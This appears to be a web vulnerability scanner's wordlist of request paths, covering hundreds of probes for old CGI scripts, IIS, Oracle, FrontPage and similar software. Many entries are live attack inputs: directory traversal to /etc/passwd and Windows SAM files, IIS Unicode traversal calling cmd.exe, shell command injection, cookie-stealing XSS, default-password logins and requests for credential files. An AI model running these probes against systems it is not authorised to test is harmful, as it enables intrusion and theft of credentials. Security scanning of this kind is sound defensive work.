cgi-bin/csPassword/csPassword.cgi
cgi-bin/cutecast/members/
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db_manager.cgi
cgi-bin/DCFORMS98.CGI
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/majordomo.pl
cgi-bin/mojo/mojo.cgi
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/non-existent.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/parse-file
cgi-bin/php-cgi
cgi-bin/pollssi.cgi
cgi-bin/postcards.cgi
cgi-bin/profile.cgi
cgi-bin/quikstore.cfg
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rmp_query
cgi-bin/robpoll.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/statusconfig.pl
cgi-bin/sws/manager.pl
cgi-bin/texis/phine
cgi-bin/Upload.pl
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/cfgwiz.exe
cgi-bin/Cgitest.exe
cgi-bin/mailform.exe
cgi-bin/ms_proxy_auth_query/
cgi-bin/post16.exe
oem_webstage/oem.conf
database/
demo/sql/index.jsp
cgi-bin/.htaccess
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/.htaccess~
cgi-bin/.htpasswd
cgi-bin/.passwd
.wwwacl
.www_acl
cgi-bin/.wwwacl
cgi-bin/.www_acl
.htpasswd
.access
.addressbook
.bashrc
.bash_history
.forward
.history
.htaccess
.lynx_cookies
.mysql_history
.passwd
.pinerc
.plan
.proclog
.procmailrc
.profile
.rhosts
.sh_history
.ssh
.ssh/authorized_keys
.ssh/known_hosts
cgi-bin/ls
///../../data/config/microsrv.cfg
///////../../../../../../etc/passwd
_vti_bin/shtml.exe/_vti_rpc
doc/rt/overview-summary.html
docs/sdb/en/html/index.html
jservdocs/
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/Language.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/realPath.jsp
tomcat-docs/index.html
cgi-bin/test-cgi.bat
akopia/
bc4j.html
dms0
jspdocs/
mod_ose_docs
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
oprocmgr-status
php/index.php
pls/portal30/admin_/
pls/simpledad/admin_/
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
search/
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admisapi/fpadmin.htm
bin/admin.pl
bin/cfgwiz.exe
bin/CGImail.exe
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
cgi-bin/CGImail.exe
cgi-bin/contents.htm
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
scripts/admin.pl
scripts/cfgwiz.exe
scripts/CGImail.exe
scripts/contents.htm
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
_private/
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
_private/_vti_cnf/
_vti_bin/
_vti_bin/admin.pl
_vti_bin/cfgwiz.exe
_vti_bin/CGImail.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/_vti_cnf/
_vti_cnf/_vti_cnf/
_vti_inf.html
_vti_log/_vti_cnf/
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/users.pwd
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
examples/
examples/context
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/index.html
help/contents.htm
help/home.html
manual/ag/esperfrm.htm
nethome/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
servlet/AdminServlet
servlet/gwmonitor
servlet/PrintServlet
servlet/SearchServlet
servlet/ServletManager
servlet/sq1cdsn
servlet/sqlcdsn
servlet/webacc
servlet/webpub
WebSphereSamples
cgi-bin/cgi-test.exe
doc/domguide.nsf
doc/dspug.nsf
doc/help4.nsf
doc/helpadmin.nsf
doc/helplt4.nsf
doc/internet.nsf
doc/javapg.nsf
doc/lccon.nsf
doc/migrate.nsf
doc/npn_admn.nsf
doc/npn_rn.nsf
doc/readmec.nsf
doc/readmes.nsf
doc/smhelp.nsf
doc/srvinst.nsf
domguide.nsf
dspug.nsf
help/domguide.nsf
help/dspug.nsf
help/help4.nsf
help/helpadmin.nsf
help/helplt4.nsf
help/internet.nsf
help/javapg.nsf
help/lccon.nsf
help/migrate.nsf
help/npn_admn.nsf
help/npn_rn.nsf
help/readmec.nsf
help/readmes.nsf
help/smhelp.nsf
help/srvinst.nsf
help4.nsf
helpadmin.nsf
helplt4.nsf
internet.nsf
javapg.nsf
lccon.nsf
migrate.nsf
npn_admn.nsf
npn_rn.nsf
readmec.nsf
readmes.nsf
smhelp.nsf
srvinst.nsf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
netbasic/websinfo.bas
perl/env.pl
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
index.html.ca
index.html.cz.iso8859-2
index.html.de
index.html.dk
index.html.ee
index.html.el
index.html.en
index.html.es
index.html.et
index.html.fr
index.html.he.iso8859-8
index.html.hr.iso8859-2
index.html.it
index.html.ja.iso2022-jp
index.html.kr.iso2022-kr
index.html.ltz.utf8
index.html.lu.utf8
index.html.nl
index.html.nn
index.html.no
index.html.po.iso8859-2
index.html.pt
index.html.pt-br
index.html.ru.cp-1251
index.html.ru.cp866
index.html.ru.iso-ru
index.html.ru.koi8-r
index.html.ru.utf8
index.html.se
index.html.tw
index.html.tw.Big5
index.html.var
test
iissamples/issamples/codebrws.asp
iissamples/issamples/ixqlang.htm
iissamples/issamples/Winmsdp.exe
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/Winmsdp.exe
mc-icons/
ns-icons/
cgi-bin/printenv
cgi-bin/test-cgi
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
test.php
test/info.php
info.php
test/phpinfo.php
NetDetector/middle_help_intro.htm
a/
basilix/
bottom.html
interchange/
sca/menu.jsp
icons/
manual/images/
doc/packages/
image/
javax
perl/
scripts
SUNWmc/htdocs/en_US/
search/inc/
images/
docs/
style/
styles/
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
uploader.php
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/exair/howitworks/Winmsdp.exe
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
conspass.chl+
consport.chl+
general.chl+
srvstatus.chl+
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
search.asp?Search=
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
NULL.printer
nul..cfm
nul..dbm
nul.cfm
nul.dbm
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/htimage.exe
mlog.html
mlog.phtml
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
i?/etc/passwd
cfide/administrator/index.cfm
CFIDE/administrator/index.cfm
directory.php?dir=%3Bcat%20/etc/passwd
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
soapConfig.xml
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
XSQLConfig.xml
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
docs/<script>alert('Vulnerable');</script>
docs/NED?action=retrieve&location=.
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
lcgi/ndsobj.nlm
surf/scwebusers
_vti_bin/fpcount.exe
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
scripts/tools/getdrvrs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/vote.cgi
cgi-bin/quizme.cgi
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/sendform.cgi
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
project/index.php?m=projects&user_cookie=1
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
active.log
?pattern=/etc/*&sort=name
images/?pattern=/etc/*&sort=name
debug/dbg?host==<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title===<script>alert('Vulnerable');</script>
debug/showproc?proc===<script>alert('Vulnerable');</script>
site/eg/source.asp
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
~nobody/etc/passwd
admin/db.php
admin/db.php?dump_sql=1
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
iissamples/exair/search/advsearch.asp
isqlplus
data/member_log.txt
data/userlog/log.txt
userlog.php
internal.sws?../../../../../../../../winnt/win.ini
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
ASP/cart/database/metacart.mdb
database/metacart.mdb
mcartfree/database/metacart.mdb
metacart/database/metacart.mdb
shop/database/metacart.mdb
shoponline/fpdb/shop.mdb
shopping/database/metacart.mdb
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
admin/phpinfo.php
start.php?config=alper.inc.php
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
cgi-bin/gettransbitmap
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
JUNK(5).xml
JUNK(5)/
cgi-bin/main_menu.pl
ban.bak
ban.dat
ban.log
banmat.pwd
admin/adminproc.asp
admin/datasource.asp
utils/sprc.asp
reports/temp/
cgi-bin/rtm.log
cgi-bin/VsSetCookie.exe?
addressbook.php?\"><script>alert(Vulnerable)</script><!--
options.php?optpage=<script>alert('Vulnerable!')</script>
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
help.php?chapter=<script>alert('Vulnerable')</script>
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/Webnews.exe
cgi-bin/webnews.pl
.../.../.../
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
texis.exe/?-dump
texis.exe/?-version
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
cgi-bin/sensepost.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
SiteServer/Publishing/ViewCode.asp
siteserver/publishing/viewcode.asp?source=/default.asp
shoutbox.php?conf=../../../../../../../etc/passwd
securelogin/1,2345,A,00.html
.%252e/.%252e/.%252e/winnt/boot.ini
add.php
class/mysql.class
inc/sendmail.inc
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
foo.php3
config.inc
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/iecreate.stm?template=../
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
catinfo
soap/servlet/soaprouter
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
JUNK(223)<font%20size=50>DEFACED<!--//--
MWS/HandleSearch.html?searchTarget=test&B1=Submit
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
server-info
cgi-bin/namazu.cgi
oekaki/
.nsconfig
cgi-bin/.nsconfig
?D=A
?N=D
?S=A
?M=A
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
dc/auth_data/auth_user_file.txt
dc/orders/orders.txt
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
applist.asp
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
cgi-bin/index.pl
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/classifieds/classifieds.cgi
cgi-bin/calendar/index.cgi
stronghold-info
stronghold-status
blah-whatever.jsp
gallery/index.php?include=../../../../../../../../../etc/passwd
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
phprocketaddin/?page=../../../../../../../../../../etc/passwd
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
demo/ojspext/events/globals.jsa
globals.jsa
pls/sample/admin_/help/..%255cplsql.conf
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
?\"><script>alert('Vulnerable');</script>
JUNK(10)abcd.html
iissamples/exair/howitworks/codebrws.asp
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.newatlanta.servletexec.JSP10Servlet/
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pass_done.php
admin/admin.php?adminpy=1
iishelp/iis/htm/tutorial/redirect.asp
Citrix/PNAgent/
Citrix/ICAWEB/
IBMWebAS/
IBMWebAS/docs/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/mbeanDocs/
iishelp/iis/misc/default.asp
Citrix/MetaFrameXP/default/login.asp
manager/html-manager-howto.html
manager/manager-howto.html
includes/adovbs.inc
adovbs.inc
fcgi-bin/echo
fcgi-bin/echo2
pls/ldc/admin_/
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
README
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
j2ee/
cgi-bin/printenv.tmp
perl/printenv
perl-status
WebCacheDemo.html
webcache/
webcache/webcache.xml
bmp/
bmp/global-web-application.xml
bmp/JSPClient.java
